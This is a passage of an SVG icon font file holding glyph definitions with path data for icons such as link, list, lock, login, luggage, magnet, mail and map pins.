0h56v-13h-56v13z m74 0h56v-13h-56v13z m74 0h56v-13h-56v13z m-591-493h55v-13h-55v13z m74 0h55v-13h-55v13z m74 0h55v-13h-55v13z m73 0h56v-13h-56v13z m74 0h56v-13h-56v13z m74 0h56v-13h-56v13z m74 0h56v-13h-56v13z m74 0h56v-13h-56v13z m74 0h56v-13h-56v13z" />
<glyph glyph-name="link-alt" horiz-adv-x="1000" unicode="&#xef70;" d="M531 255l-62-62c9-9 14-20 14-32 0-12-4-23-14-32l-156-158c-8-9-19-14-31-14-13 0-23 5-33 14l-125 125c-9 9-14 20-14 32 0 12 4 22 13 31l157 158c8 9 18 14 31 14s23-5 32-13l63 62-32 32c-18 18-39 27-63 26-25 0-46-9-64-26l-219-222c-17-17-26-38-26-63 1-25 10-46 27-64l190-188c17-17 38-25 63-25 24 0 46 9 64 26l219 222c17 18 26 39 25 64 0 24-9 45-27 62l-32 31z m440 382l-190 188c-17 17-38 25-63 25-24 0-46-9-64-26l-219-222c-17-18-25-39-25-63 0-25 9-46 27-63l32-31 62 62c-9 10-14 20-14 32 0 12 5 23 14 32l156 158c8 9 19 14 31 14 13 0 24-5 33-14l125-125c9-9 14-19 14-31 0-13-4-23-13-32l-157-158c-8-9-18-14-31-13-12 0-23 4-32 12l-63-62 32-32c18-18 39-27 63-26 25 0 46 9 64 26l220 222c17 18 25 39 25 63-1 25-9 46-27 64z m-640-414c0-12 4-23 12-32 9-8 19-12 32-12 12 0 23 4 32 13l251 254c8 8 11 19 11 31 0 13-4 23-12 32-9 8-19 12-32 12-12 0-23-4-32-13l-250-253c-8-9-12-19-12-32z" />
<glyph glyph-name="link" horiz-adv-x="1000" unicode="&#xef71;" d="M894 654c-28 30-57 60-87 88-64 60-160 61-224 1-46-42-89-88-133-132 0 0-1-1-1-1 0-1 0-2 1-2 0 0 1 0 1 0 2 0 3 0 5 0 39 0 76-8 110-27 6-3 8-1 12 2 25 26 50 51 76 76 24 24 57 24 81 0 25-24 50-49 74-74 24-24 24-57 1-80-77-78-154-155-232-232-7-7-16-12-25-14-22-7-40 1-56 17-21 20-42 41-62 61-6 7-17 7-23 0l-54-54c-6-6-6-17 0-23 22-23 44-46 67-68 63-61 165-61 228 0 25 25 50 50 75 75 56 56 113 111 167 169 57 59 56 158-1 218z m-346-562c-1 0-1 0-2 0-40 0-78 8-113 27-5 4-8 1-11-2-25-26-50-51-75-76-25-24-58-24-83 1-23 23-46 46-70 69-29 29-29 60 0 89l223 222c2 3 4 5 7 7 17 16 42 20 62 8 7-3 14-9 19-15 20-20 40-40 60-59 6-7 17-7 23 0 18 18 37 36 55 55 7 6 7 16 0 23-25 25-51 52-78 76-61 52-155 49-213-5-42-39-81-80-121-120-42-42-85-83-126-127-57-61-56-158 1-220 28-30 57-59 87-87 63-60 160-61 223-2 46 43 90 89 134 133 0 0 1 1 1 1 0 1-1 2-3 2z" />
<glyph glyph-name="list" horiz-adv-x="1000" unicode="&#xef72;" d="M828 788h-656c-30 0-55-25-55-55v-766c0-30 25-55 55-55h656c30 0 55 25 55 55v766c0 30-25 55-55 55z m-188-90h158v-55h-158v55z m-441 0h159v-55h-159v55z m621-725h-640v587h640v-587z m-552 434h468c16 0 28 13 28 29s-12 28-28 28h-468c-15 0-28-13-28-28s13-29 28-29z m0-116h468c16 0 28 12 28 28s-12 28-28 28h-468c-15 0-28-13-28-28s13-28 28-28z m0-117h468c16 0 28 13 28 28s-12 28-28 28h-468c-15 0-28-12-28-28s13-28 28-28z m0-117h468c16 0 28 13 28 28s-12 29-28 29h-468c-15 0-28-13-28-29s13-28 28-28z" />
<glyph glyph-name="listening" horiz-adv-x="1000" unicode="&#xef73;" d="M386 199c-2-1-4-2-6-3-24-13-24-13-12-39 2-5 4-10 6-16 8-31-3-59-28-73-25-14-55-8-77 15-14 15-23 33-28 53-14 57-44 105-85 146-36 37-61 80-74 130-25 92 11 177 90 216 82 40 175-6 188-95 3-21 1-42-2-63-2-17-19-36-8-48 11-12 33-13 49-21 14-6 18 0 21 12 6 20 11 40 14 60 15 92-22 175-96 216-78 42-157 21-173 16-95-33-162-122-165-225-2-99 37-180 103-250 30-32 53-66 64-109 6-20 14-39 24-57 24-40 56-70 103-77 52-8 96 9 128 51 35 43 36 92 16 143-15 39-16 39-52 18z m558 128c-28 2-57-2-71-31-12 29-25 58-37 88-5 11-10 23-26 23-16 0-19-13-24-25l-26-66-42 159 0 0c-5 21-9 42-14 63-5 21-22 29-36 18-9-6-9-17-11-26-1-9-3-18-4-27v1l-40-224-4 10c-12 45-24 90-36 135-4 13-7 26-24 27-18 0-21-14-25-26-9-28-18-56-25-83-3-12-9-18-22-17-20 1-40 0-60 1-17 0-13-12-13-22 0-9-6-23 13-23 30 1 60 0 90 0 13 0 20 7 24 19 4 14 9 28 14 47 3-10 6-16 7-21 14-56 28-111 42-167 3-13 5-28 24-28 21 0 22 16 24 30 6 37 12 74 18 111 7 39 13 79 20 118l3 22 35-141c3-12 6-24 9-35 3-13 5-25 21-27 17-2 22 11 27 23 12 30 24 60 37 94 12-29 23-55 35-81 11-25 29-27 45-6 8 11 16 21 23 32 5 7 10 11 19 10 22 0 44 0 66-1v46c-19 0-37-2-56 0z m-707 109c-10-12-20-25-27-39-21-46-5-103 36-128 38-23 80-4 87 39 6 35-10 66-44 83-12 6-12 9-5 19 19 23 32 50 32 81 0 46-24 78-67 90-49 13-96-15-119-70-16-38-15-37 25-45 11-2 17 0 20 12 4 17 12 33 26 44 13 10 28 12 43 5 15-7 19-21 19-36-1-22-12-39-26-55z" />
<glyph glyph-name="listine-dots" horiz-adv-x="1000" unicode="&#xef74;" d="M984 737c-5 3-11 5-17 6h-766c20-18 33-43 33-72s-13-53-33-71c254 0 507 0 761 0h3c8 0 15 3 21 8 8 5 11 13 14 21v84c-3 10-8 18-16 24z m-826-66c0-43-35-79-79-79s-79 36-79 79c0 44 35 80 79 80s79-36 79-80z m809-142h-766c20-18 33-44 33-72s-13-54-33-72c254 0 507 0 761 0h3c8 0 15 3 21 8 8 6 11 13 14 22v84c-3 9-8 18-16 23-5 4-11 5-17 7z m-809-72c0-44-35-79-79-79s-79 35-79 79c0 44 35 79 79 79s79-35 79-79z m809-143h-766c20-17 33-43 33-71s-13-54-33-72c254 0 507 0 761 0h3c8 0 15 3 21 8 8 5 11 13 14 21v84c-3 10-8 18-16 24-5 4-11 5-17 6z m-809-71c0-44-35-80-79-80s-79 36-79 80c0 43 35 79 79 79s79-36 79-79z m809-143h-766c20-18 33-43 33-72s-13-54-33-71c254 0 507 0 761 0h3c8 0 15 3 21 8 8 5 11 13 14 21v84c-3 10-8 18-16 24-5 3-11 5-17 6z m-809-72c0-43-35-79-79-79s-79 36-79 79c0 44 35 80 79 80s79-36 79-80z" />
<glyph glyph-name="listing-box" horiz-adv-x="1000" unicode="&#xef75;" d="M35 314c-19 0-35-16-35-35 0-24 0-48 0-73 0-8 3-15 9-22 8-10 19-13 32-13l179 0v143h-180l-5 0z m925 0h-686v-143c229 0 457 0 685 0 2 0 4 0 6 0 9 0 16 3 22 8 7 6 10 13 13 21v85c0 0-1 0-1 1-6 20-18 28-39 28z m24 423c-5 3-11 5-17 6h-693v-143c230 0 459 0 688 0h3c8 0 15 3 21 8 8 5 11 13 14 21v84c-3 10-8 18-16 24z m-953 5c-19-3-31-17-31-37 0-23 0-46 0-68 0-3 0-6 1-8 2-15 17-29 36-29l183 0v143h-187c-1 0-1-1-2-1z m2-214c-18-1-33-16-33-36 0-23 0-47 0-71 0-2 0-5 1-7 4-17 18-29 36-29h183v143h-180c-2 0-4 0-7 0z m927 0h-686v-143h646c15 0 29 0 44 0 9 0 17 3 23 9 7 6 11 13 13 21v84c0 0-1 0-1 1-6 20-18 28-39 28z m-924-428c-20-1-36-16-36-37 0-23 0-47 0-70 0-10 4-18 10-25 8-9 19-11 31-11 60 0 119 0 179 0v143h-179c-2 0-3 0-5 0z m920 0h-682v-143c229 0 457 0 685 0 3 0 5 0 7 0 11 0 19 5 25 12 5 5 7 11 9 17v84c-9 24-18 30-44 30z" />
<glyph glyph-name="listing-number" horiz-adv-x="1000" unicode="&#xef76;" d="M968 313h-744c-1 0-2 0-4 0-15-1-28-16-28-35 0-24 0-48 0-72 0-9 2-16 7-22 7-10 15-13 26-13 247 0 495 0 742 0 2 0 3 0 5 0 7 0 12 3 17 8 6 5 9 13 11 21v84c0 0 0 0-1 0-5 20-14 29-31 29z m19 419c-4 4-9 5-14 7h-754c-1-1-1-1-2-1-15-4-25-18-25-37v-68c0-3 0-5 0-8 3-14 15-29 30-29 249 1 498 0 747 0h3c6 0 12 3 17 8 6 6 9 13 11 21v84c-2 10-6 18-13 23z m-19-202h-744c-2 0-3 0-5-1-15-1-27-16-27-35 0-24 0-47 0-71 0-2 0-5 1-7 3-17 14-28 29-28h713c12 0 24 0 36 0 7 0 13 3 19 8 5 6 8 13 10 21v84c0 0 0 0-1 0-5 20-14 29-31 29z m-4-426h-739c-1 0-3 0-4 0-16 0-29-16-29-36 0-23 0-47 0-70 0-10 3-18 8-25 7-9 15-11 25-11 247 0 495 0 742 0 2 0 4 0 6 0 8 1 15 5 20 13 4 4 5 10 7 16v84c-7 23-15 29-36 29z m-941 571c3 2 6 3 9 5 2 1 4 3 6 5v-41h-30v-35h96v35h-27v82h-39c-1-1-3-3-6-6-3-2-6-4-9-6-4-2-7-4-11-5-3-2-6-2-8-2v-36c3 0 6 0 9 1 4 1 7 2 10 3z m54-234c4 2 7 4 11 7 3 2 5 4 8 6s5 4 7 7c2 3 3 6 4 9 1 3 2 7 2 11 0 12-4 21-13 28-8 6-20 9-35 9-6 0-12 0-18-1s-11-2-16-4c-5-2-9-4-13-6s-8-5-10-8l24-29c5 5 9 9 13 11 4 3 8 4 13 4 4 0 7-1 9-3 2-1 3-4 3-7 0-2 0-3-1-4 0-1-2-2-4-4s-5-3-10-5-10-6-17-10c-6-3-11-6-15-10s-7-7-9-11-5-9-6-14c-1-5-1-11-1-18h108v35h-45c3 2 7 5 11 7z m-29-238c-6 0-11 1-15 2-5 2-9 4-13 7l-20-28c7-6 14-10 22-13 8-3 17-4 28-4 9 0 17 1 25 3 7 2 13 5 18 8 5 4 9 8 12 14s4 11 4 17c0 5-1 9-2 13s-4 8-6 12-6 6-9 8-8 3-12 4c4 1 7 2 10 4 4 2 7 5 9 8s4 6 5 10 2 8 2 12c0 5-1 10-3 15-3 4-6 8-11 11-4 3-9 6-16 7-6 2-13 3-20 3-6 0-12-1-17-1s-10-3-15-4-9-4-13-6c-4-2-7-5-9-8l25-29c3 5 6 9 11 11s8 4 13 4c4 0 8-1 10-3 2-2 4-4 4-8 0-4-2-8-6-10s-10-4-16-4h-8v-27h7c9 0 16-1 20-3 4-3 6-6 6-12 0-4-1-8-5-10-3-2-8-3-15-3z m44-98h-27l-65-83v-35h53v-26h39v26h18v35h-18v83z m-35-83h-18l18 25v-25z" />
<glyph glyph-name="live-support" horiz-adv-x="1000" unicode="&#xef77;" d="M875-72c1 35 0 69-6 104-7 47-28 82-74 100l-5 3c-33 15-68 24-103 34-20 6-41 12-61 18 0-1 0-1 0-2l0-6c2-22 3-45-6-67-24-58-60-107-111-143-7-5-11-5-17 0-52 36-88 85-112 143-5 11-6 23-7 35 0 14 0 27 2 40-1 0-2 0-3 0-40-12-80-24-120-37-30-9-58-21-83-40-10-8-18-17-23-29-8-19-13-38-16-59-2-13-3-26-5-39 0-21 0-42 0-63 0-6 1-8 7-8 248 1 496 1 744 1 0 5-1 10-1 15z m-674 464c0-4 0-9 0-13 1-22 18-41 43-45 17-2 34-2 51-1 4 0 10 5 13 9 3 3 2 8 2 12v31c17-42 48-74 87-97 12-8 25-14 40-18-77 71-70 191-46 239 3-1 4-4 5-6 40-59 97-91 168-97 25-3 51 0 75 7 6 1 8-1 7-6-1-6-1-12-2-18-7-45-24-84-58-116l-3-1c-18-4-28-18-26-33 2-15 17-27 37-27 17-1 34-1 51 0 10 0 20 2 26 9 6 6 12 6 20 7 26 1 51 5 75 14 55 20 88 54 93 105 3 28 1 57 1 86 0 22-9 32-36 38 0 4 1 10 0 14-2 5-5 11-9 13-8 2-9 6-8 12 0 15-3 30-17 37-18 9-21 21-21 35 0 1 0 2 0 2-7 55-33 101-80 139-61 51-135 72-220 62-95-11-164-55-207-129-17-29-24-60-25-92 0-4-2-6-6-8-16-8-26-19-28-34-1-5-1-11-2-16 0-2-1-5-2-6-13-3-15-11-15-21 0-22 0-43 0-64 0-14 2-17 17-23z m605-16c1 10 2 19 15 23 0 0 1 0 2 0 0-15-1-30 0-45 0-25-12-46-33-62-31-24-69-31-109-33-2 0-5 2-7 3-8 8-18 12-30 12-16-1-33 0-50-1 28 12 53 28 74 49 12 11 22 24 30 38v-9c0-12 7-18 22-18h30c32 0 54 16 56 43z m-69 153c6 0 11 0 16 0 11-1 16-7 16-18 0-38 0-77 0-115 0-2 0-5 0-7 2-25-10-26-32-24v164z m-348 200c85 41 171 37 250-11 62-38 93-91 95-157-4 0-7 0-10 0-9 1-16-1-20-5-6 11-13 21-21 31-41 50-94 76-159 80-64 4-122-15-168-61-20-20-35-42-46-64 0 1 0 3 0 4-2 10-8 14-19 15-6 0-11 0-17 0 4 74 40 131 115 168z m-149-220c0 16 5 20 23 20h9v-164c-1 0-2 0-2 0-26-1-30 2-30 24v120z" />
<glyph glyph-name="location-arrow" horiz-adv-x="1000" unicode="&#xef78;" d="M935 777c-111-286-222-572-334-860-2-5-5-5-7 0-7 16-14 32-20 47-46 108-92 216-138 324-2 5-7 9-11 11-119 47-237 93-356 139-1 1-3 2-5 3-3 1-1 4 4 6 288 113 574 225 859 337 5 2 10 4 10 3 1-1 0-5-2-10z" />
<glyph glyph-name="location-pin" horiz-adv-x="1000" unicode="&#xef79;" d="M481-66c-19 25-38 51-55 76-62 87-118 177-164 273-22 47-43 96-53 147-19 97 4 184 69 257 63 72 144 104 239 100 132-5 247-105 274-235 11-53 8-105-9-157-33-104-84-198-143-288-42-65-88-127-132-190-1-1-2-3-4-4-2-3-12 7-22 21z m165 552c3 75-59 145-134 149-86 5-153-55-157-142-4-75 60-145 136-148 84-4 150 56 155 141z" />
<glyph glyph-name="lock" horiz-adv-x="1000" unicode="&#xef7a;" d="M766 403v120c0 146-119 265-265 265-147 0-265-119-265-265v-120h-57v-491h643v491h-56z m-431 120c0 91 75 165 166 165 91 0 165-74 165-165v-120h-331v120z m211-476h-91l14 135c-17 10-28 29-28 50 0 33 27 60 60 60 33 0 59-27 59-60 0-21-11-40-28-50l14-135z" />
<glyph glyph-name="login" horiz-adv-x="1000" unicode="&#xef7b;" d="M719 333c10 9 10 25 0 35l-285 294c-10 9-25 9-34 0l-57-59c-9-9-9-25 0-35l135-139h-364c-13 0-24-11-24-24v-99c0-14 11-25 24-25h374l-145-149c-9-10-9-26 0-35l57-59c9-9 24-9 34 0l285 295z m-137 333h206v-632h-206v-122h267c33 0 61 28 61 61v754c0 33-28 61-61 61h-267v-122z" />
<glyph glyph-name="logout" horiz-adv-x="1000" unicode="&#xef7c;" d="M903 333c9 9 9 25 0 35l-286 294c-10 9-25 9-34 0l-57-59c-9-9-9-25 0-35l135-139h-364c-13 0-24-11-24-25v-98c0-14 11-25 24-25h374l-145-149c-9-10-9-26 0-35l57-59c9-9 24-9 34 0l286 295z m-485 333h-206v-632h206v-122h-267c-34 0-61 28-61 61v754c0 33 27 61 61 61h267v-122z" />
<glyph glyph-name="lollipop" horiz-adv-x="1000" unicode="&#xef7d;" d="M500 788c-97 0-180-52-217-127h434c-37 75-120 127-217 127z m0-487c97 0 180 52 217 126h-434c37-75 120-126 217-126z m247 342h-494c-15-30-23-64-23-99s8-68 23-98h494c15 30 23 63 23 98s-8 68-23 99z m-299-679c0-14 6-27 15-36 9-10 22-16 37-16 29 0 52 24 52 52v305h-104v-305z" />
<glyph glyph-name="long-drive" horiz-adv-x="1000" unicode="&#xef7e;" d="M889 161c-15 12-30 22-47 31-43 23-88 40-135 53-10 2-17 7-24 15-28 33-57 66-85 99-10 11-20 17-34 20-88 19-176 13-263-6-56-12-111-27-155-67-33-29-57-63-57-111 0-35-7-67-17-104-4-15-3-32 0-47 6-26 25-46 54-54 1 41 15 75 45 101 40 36 86 46 137 27 53-20 81-60 88-115 1-13 6-15 17-15 62 0 124 1 186 0 18-1 25 3 27 22 7 64 60 112 123 117 62 4 121-36 139-96 2-7 4-15 6-24 5 6 9 9 11 13 29 40 21 108-16 141z m-531 89c0-10-4-14-14-14-28 1-56 1-84 1-26 0-53 0-80-1-10 0-14 2-15 14-1 21 5 35 24 46 48 27 99 45 153 55 12 2 16-1 16-14-1-29-1-58 0-87z m40-13c-8 0-10 3-10 10 0 33 0 66 0 99 0 7 3 10 11 11 55 3 109-4 162-15 3-1 6-3 8-5 26-32 52-65 82-100-88 0-170 0-253 0z m503 285v2c-15 3-30 6-45 8-12 3-12 2-11-10 0-6 0-12 0-18 19 6 37 12 56 18z m-261 190c4 0 7 0 11-1 7-1 10 0 7 8-4 17-10 35-12 52h-2c-4-15-9-31-13-47-4-12-4-12 9-12z m-156-269c2-6 5-11 8-16 36 0 72-4 109-12 13-3 24-9 33-19 14-18 29-35 44-52 88 22 142 104 126 195-13 76-85 145-185 135-81-7-148-82-147-167 0-22 4-43 12-64z m285-106c-2 8-6 6-11 3-10-7-21-13-31-19-7-3-8-6-3-11 12-11 23-22 34-33l34-32 2 1-5 21c-7 24-14 47-20 70z m78 6l1 2c-14 19-27 37-41 56-8-9-15-18-22-26-4-5 0-6 4-7 12-6 25-11 38-16 6-3 13-6 20-9z m-399 84c-4 15-8 28-11 43-2 9-4 9-11 5-26-15-52-30-77-44l1-4 98 0z m483-11c-30 19-55 35-80 51-7 4-9 2-11-5-3-12-7-23-11-34-3-7-1-9 5-10 31-1 61-4 97-2z m-494 123c1 5-1 7-6 6-19-3-39-6-59-9l0-2c20-8 41-16 61-25 2 12 2 21 4 30z m11 44c5 11 11 22 17 34 2 4 5 8-2 9-30 7-60 13-89 20l-2-4 67-62c5-4 7-3 9 3z m371 25c6-13 11-25 18-40 26 22 50 43 75 64-31-2-60-8-89-13-9-1-7-5-4-11z m-24 34c10 19 20 38 31 57l-2 2c-20-12-40-24-58-35 7-9 14-17 20-24 3-4 6-6 9 0z m-286 18c3 2 5 4 8 6 5 3 5 6 0 9-19 12-37 24-55 36l-2-1c7-15 14-29 21-44 11-21 11-21 28-6z m210 37c8-4 15-7 24-11l12 95-4 1c-14-17-27-35-40-52-18-23-18-23 8-33z m-125 12c-19 27-38 53-56 79l-4-2c3-32 6-63 9-96 18 7 34 13 51 19z m-252-713c0-46-37-84-83-84s-83 38-83 84 37 83 83 83 83-37 83-83z m505 0c0-46-38-84-84-84s-83 38-83 84 37 83 83 83 84-37 84-83z" />
<glyph glyph-name="look" horiz-adv-x="1000" unicode="&#xef7f;" d="M668 459c-32 165-192 274-355 243-170-32-277-191-245-360 32-163 193-272 357-240 166 31 274 191 243 357z m-259-272c-119-23-233 55-256 176-22 117 56 230 174 253 118 23 233-55 255-173 23-118-55-233-173-256z m271 62c-18-27-37-55-55-81 86-59 172-117 257-175 19 27 38 55 56 81-86 58-172 117-258 175z m-183 201c-38 31-81 46-134 47-6-1-17-1-28-3-61-11-107-43-138-97 0-1 0-3 0-4 13-23 28-43 49-58 52-40 111-52 175-35 52 14 91 45 117 92 1 1 1 3 1 5-11 20-25 38-42 53z m-163-114c-10 3-21 7-31 11-23 10-42 25-57 44-2 3-2 5 0 7 23 29 52 47 88 55-43-26-44-89 0-116l0-1z m10 69c-9 0-16 8-15 16 0 9 7 16 15 16 9 0 16-7 16-16 1-9-7-16-16-16z m146-13c-20-27-54-49-90-56 22 15 34 34 34 59 0 25-12 44-33 58 24-5 46-15 65-31 9-7 16-16 24-25 2-1 2-3 0-5z" />
<glyph glyph-name="loop" horiz-adv-x="1000" unicode="&#xef80;" d="M823 238h-87c-7 0-13-6-13-12v-87c0-7-5-12-12-12h-422c-7 0-12 5-12 12v88c0 6 5 12 12 12h84c7 0 9 4 4 9-50 49-99 99-147 146-5 5-13 5-17 0-49-49-99-98-148-147-4-5-3-9 4-9h82c7 0 13-2 13-6v-129c0-53 36-89 89-89h494c52 0 89 36 89 88v130c0 3-6 6-13 6z m108 224h-83c-7 0-12 3-12 6v5c0 42 0 83 0 125 0 51-37 88-89 88h-495c-52 0-88-37-88-88v-130c0-3 5-6 12-6h88c7 0 12 6 12 13v86c0 7 6 12 12 12h423c6 0 12-5 12-12v-87c0-7-6-12-12-12h-84c-7 0-8-4-3-9l146-146c4-5 12-5 17 0 49 48 98 97 148 146 5 5 3 9-4 9z" />
<glyph glyph-name="luggage" horiz-adv-x="1000" unicode="&#xef81;" d="M711 612h-121v110h28c11 0 20 9 20 20v26c0 11-9 19-20 19h-237c-11 0-19-8-19-19v-26c0-11 8-20 19-20h28v-110h-121c-27 0-48-22-48-49v-500h520v500c0 28-22 49-49 49z m-268 110h113v-109h-113v109z m-203-734c0-27 21-49 48-49h22c2-6 5-11 9-15 7-7 17-12 28-12 17 0 32 11 38 26h230c2-5 5-10 9-14 7-7 17-12 28-12 17 0 32 11 38 26h21c27 0 49 22 49 49v56h-520v-55z" />
<glyph glyph-name="lunch" horiz-adv-x="1000" unicode="&#xef82;" d="M335 623c-152-1-273-123-272-276 0-148 124-271 273-270 153 0 274 126 273 276-2 149-124 270-274 270z m1-455c-102 0-182 81-182 183 0 100 81 181 182 180 101 0 182-81 181-181 0-101-81-182-181-182z m601 369c-1 36-27 62-61 63-34 1-61-24-63-59-2-25-1-50-1-75 1-22 10-40 28-52 7-4 8-8 8-15 0-60 0-120 0-180v-90c0-11 4-21 14-26 20-10 40 3 40 27 0 90 0 180-1 270 0 6 2 10 8 14 17 11 26 26 27 46 1 14 1 28 1 42h0c0 12 1 23 0 35z m-166 63c-7 0-10-5-10-12 0-25 0-50 0-74v-21h-17v92c0 7-1 14-9 15-10 0-9-8-9-15v-80c0-4-1-8-1-11h-17c0 31 0 62 0 92 0 7-1 14-9 14-8 0-9-7-9-13 0-28 0-55 0-82v-12h-18v93c0 6-1 14-9 14-8 0-9-7-9-14 0-39-1-78 0-117 0-23 9-43 29-55 6-4 7-8 7-14 0-58 0-116 0-174 0-33 0-66 0-99 0-15 10-26 24-27 13-2 26 7 29 21 1 5 1 10 1 15 0 88 0 175 0 262 0 8 1 13 8 17 17 11 26 28 27 48 0 42 0 83 0 125 0 6-2 11-8 12z m-436-80c-93 0-170-76-170-169 0-95 76-172 170-172 93 0 171 77 171 169 0 96-75 172-171 172z" />
<glyph glyph-name="lungs" horiz-adv-x="1000" unicode="&#xef83;" d="M504 327c-21-19-42-38-62-57-6-5-11-12-17-16-10-8-11-18-11-29 0-59-2-118-11-176 0-2-1-3-1-4-2-31-23-43-50-49-44-10-88-10-133-7-32 3-63 9-94 19-35 11-52 36-59 71-6 38-3 76-1 113 3 42 6 84 7 126 1 40 11 76 27 112 42 93 99 175 172 247 7 7 16 14 25 20 13 9 24 10 36-2 11-11 21-24 27-38 19-38 28-80 33-122 8-56 13-112 18-169 0-1 1-2 1-5 11 11 19 22 30 31 15 13 19 28 19 48-1 87 0 174 0 261v12h80v-13c0-92-1-184 0-277 0-6 2-12 6-17 11-15 23-30 35-44 2-2 4-4 7-8 1 15 2 27 3 40 4 61 10 121 23 181 7 32 15 64 31 93 6 10 15 20 23 28 11 9 24 11 35 1 16-13 32-26 46-40 62-67 113-141 150-224 19-41 29-84 29-129 1-49 6-98 9-147 1-31 2-63-7-93-8-26-24-45-50-54-40-14-82-20-124-22-33-2-66-1-98 6-57 13-55 20-63 67-8 58-10 116-9 175 0 10-3 17-10 23-26 24-50 48-72 68z" />
<glyph glyph-name="magic-alt" horiz-adv-x="1000" unicode="&#xef84;" d="M115 308h492v-299h-492v299z m0-327h492v-8c0-34-25-61-57-61h-378c-32 0-57 27-57 61v8z m514 411h-536c-17 0-30-15-30-32 0-18 13-32 30-32h536c17 0 31 14 31 32-1 17-14 32-31 32z m307 366l-8 18c-4 10-16 14-25 10l-424-205 26-54 422 204c9 5 13 17 9 27z m-618-277l8-19c5-10 16-14 26-9l118 57-25 54-117-57c-10-4-14-16-10-26z m-252 69l65-30c1-1 2-2 3-3l25-64c2-6 9-6 11 0l25 64c1 1 2 2 3 3l65 30c5 2 5 10 0 12l-65 26c-2 1-3 2-4 3l-24 62c-2 5-9 5-11 0l-24-62c-1-1-2-2-4-3l-65-26c-5-2-5-10 0-12z m219 135l41-19c0 0 1-1 2-2l15-40c1-3 6-3 7 0l16 40c0 1 1 2 2 2l40 19c3 2 3 6 0 8l-41 16c-1 0-1 1-2 2l-15 39c-1 3-6 3-7 0l-15-39c-1-1-1-2-2-2l-41-16c-3-2-3-6 0-8z" />
<glyph glyph-name="magic" horiz-adv-x="1000" unicode="&#xef85;" d="M375 662c4-4 5-12 4-17l-17-56c-2-5 1-8 6-6l55 21c5 2 13 1 17-2l48-34c4-3 7-1 7 5l-3 58c0 5 3 12 8 15l46 35c5 4 4 7-2 9l-55 15c-5 2-11 7-13 12l-19 55c-2 5-6 5-9 1l-31-49c-3-4-10-8-16-8l-58-1c-5 0-7-4-3-8l35-45z m384-107c-10 0-22 7-26 15l-54 87c-5 9-12 8-15-1l-37-95c-4-9-13-19-23-21l-99-24c-10-2-11-8-4-15l80-64c7-6 12-18 12-28l-8-102c-1-10 5-13 13-7l86 55c8 5 22 6 30 3l95-39c8-4 14 0 11 10l-26 98c-3 10 0 23 6 31l67 77c6 7 3 14-6 14l-102 6z m176 126l-32 9c-3 1-7 4-8 7l-11 32c-1 3-3 3-5 0l-18-28c-2-3-6-4-9-4l-34-1c-3 0-4-2-2-5l21-26c2-3 3-7 2-10l-10-32c-1-3 1-5 4-4l32 12c2 1 7 1 10-1l27-19c3-2 5-1 4 2l-1 33c0 4 2 8 4 10l27 20c2 2 2 4-1 5z m-585-384l-178-181-94-95c-18-18-21-46-5-62l25-25c16-16 44-14 62 5l318 317-74 96-54-55z m75 75l71-99 57 58-74 96-54-55z" />
<glyph glyph-name="magnet" horiz-adv-x="1000" unicode="&#xef86;" d="M346 788h-257v-196h257v196z m566-239v12h-258v-12c0-77 0-154 0-231 0-12-1-24-4-36-15-68-77-117-150-118-72 1-135 50-150 118-2 12-3 24-3 36-1 77-1 154-1 231v12h-257v-12c0-80-1-161 0-241 1-96 35-181 98-254 61-70 138-115 230-133 28-5 56-8 83-9h1c27 1 55 4 83 9 92 18 169 63 230 133 63 73 97 158 98 254 1 80 0 161 0 241z m-1 239h-257v-196h257v196z" />
<glyph glyph-name="mail-box" horiz-adv-x="1000" unicode="&#xef87;" d="M801 623v-601h-55v79l-137-74 0 601c-11 70-54 128-112 160h139c84-12 151-79 165-165z m-219 0v-711h-55v118h0l-273 39v-102h-55v656c15 95 96 165 191 165 96 0 177-70 192-165z m-82 0h-219v-109h219v109z" />
<glyph glyph-name="mail" horiz-adv-x="1000" unicode="&#xef88;" d="M892 680h-784c-25 0-45-20-45-45v-570c0-25 20-45 45-45h784c25 0 46 20 46 45v570c0 25-21 45-46 45z m-14-572c0-15-13-27-28-27h-707s-20 12-20 27v484c0 15 9 27 20 27h707c15 0 27-12 27-27v-484z m-478 426h-192c-7 0-13-6-13-13v-33c0-7 6-13 13-13h192c7 0 13 6 13 13v33c0 7-6 13-13 13z m392-238h-366c-7 0-13-5-13-12v-33c0-7 6-13 13-13h366c7 0 13 6 13 13v33c0 7-6 12-13 12z m0-93h-366c-7 0-13-6-13-13v-33c0-7 6-12 13-12h366c7 0 13 5 13 12v33c0 7-6 13-13 13z m0 352h-126c-7 0-13-5-13-12v-145c0-7 6-13 13-13h126c7 0 13 6 13 13v145c0 7-6 12-13 12z" />
<glyph glyph-name="male" horiz-adv-x="1000" unicode="&#xef89;" d="M678 526c-1 59-42 98-100 98-54 0-107 0-160 0-56-1-97-42-97-98 0-28 0-56 0-84 0-39 0-77 0-116 0-22 15-38 35-39 23 0 39 15 39 39 0 58 0 117 0 175 0 5 3 10 5 15 2-5 5-10 5-15 0-179 0-358 0-536 0-5 0-9 0-13 1-17 12-32 28-37 31-10 58 10 59 42l0 273c0 6-3 16 8 16 10 0 7-10 7-16 0-90 0-179 1-269 0-10 2-21 7-29 9-17 30-23 50-17 18 5 30 20 30 41 0 91 0 181 0 272 0 91 0 181 0 272 0 5 3 10 4 15 2-5 5-10 5-15 0-57 0-114 0-171 0-13 3-25 15-34 12-8 25-10 38-3 16 7 21 21 21 37 1 66 1 132 0 197z m-179 108c44 0 77 33 77 77 0 42-34 76-76 76s-78-35-77-77c0-42 34-75 76-76z" />
<glyph glyph-name="map-pins" horiz-adv-x="1000" unicode="&#xef8a;" d="M275 409c35 45 68 91 91 143 8 19 15 39 15 60-2 106-106 181-207 150-82-26-141-124-96-211 17-33 35-65 56-96 27-38 57-74 87-113 19 24 37 45 54 67z m-109 202c0 30 26 55 56 55 31 0 56-26 55-56 0-30-26-56-55-55-31 0-56 25-56 56z m770-327c-12 94-106 156-198 133-82-21-153-121-99-223 26-50 58-96 92-140 15-19 31-38 47-58 39 45 75 89 105 137 16 25 30 52 42 79 11 22 15 46 11 72z m-157-77c-31 0-56 26-56 56 0 30 26 56 56 56 30 0 56-26 55-56 0-30-25-56-55-56z m-229-229c-16 1-32 2-48 3-15 1-24-6-25-18-1-13 7-22 22-23 14-1 28-2 42-3v0h6c15 0 24 7 25 20 0 11-8 20-22 21z m-262 32c-15 4-30 9-45 13-3 1-6 2-8 2-11 0-19-7-21-16-2-10 3-21 14-24 16-6 33-11 50-15 14-4 24 2 27 14 4 12-3 22-17 26z m133-22c-19 3-37 5-55 7-12 0-21-7-22-18-1-11 5-21 17-23 18-2 36-5 